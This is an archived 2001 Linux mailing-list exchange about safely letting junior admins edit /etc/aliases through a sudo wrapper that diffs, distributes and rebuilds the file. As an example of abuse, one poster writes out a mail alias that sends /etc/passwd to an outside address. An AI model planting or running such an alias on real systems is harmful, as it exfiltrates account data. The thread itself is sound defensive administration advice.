hi joshua...
/etc/aliases... what can we do with it...
i dont know if this was bill's original intent or not
but lets see what can (regular) people do with /etc/aliases
/etc/aliases
badthing: mail -s send me the passwd [EMAIL PROTECTED] \
/etc/passwd
but since the persons allowed to edit the /etc/aliases file is internal
anyway .. dont think we have to worry about that kind of stuff
if the company is 500 people with people leaving and coming onboard
and if there are jr admins... let them add/delete the people
from all or sales or engineering or managers etc...
- in this case ..the sudo wrapper/editor script is good
and the script can also propagate the /etc/aliases file to
each machine that needs to have the aliases file kept current
root@Slaves # sucpaliases -scp
where it does ( and only if its out-of-date )
scp MasterCopy:/etc/aliases /etc ; newaliases
the wrapper script can also do the difff and/or run newaliases
depending on your level of paranoia of the ones allowed to run
this sudo alias script
- nothing happens till *you* run new aliases...which i would
do myself if i was responsible... but id do a diff between
the new one and the previously tested/good version
have fun linuxing
alvin
On Fri, 30 Nov 2001, Joshua Goodall wrote:
That is a fair point but addressable with post-editing checks
in the wrapper. Of course, one is exceedingly vulnerable to
race conditions if one is not very careful about what is read and
when.
You don't have to use vi; there are dumber editors in the world.
Maybe you should just have some programmatic (i.e. commandline,
not full-screen) editing program for aliases that's callable from sudo.
However the whole idea fills me with worry; /etc/aliases IS quite a critical
file and I'm certain that specific attacks could be engineered
against you if write access was obtained.
Why not just have users make their changes and mail a diff to
the sysadmin for approval :)
J
p.s. failing that, investigate LIDS; but that's a different ball game.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]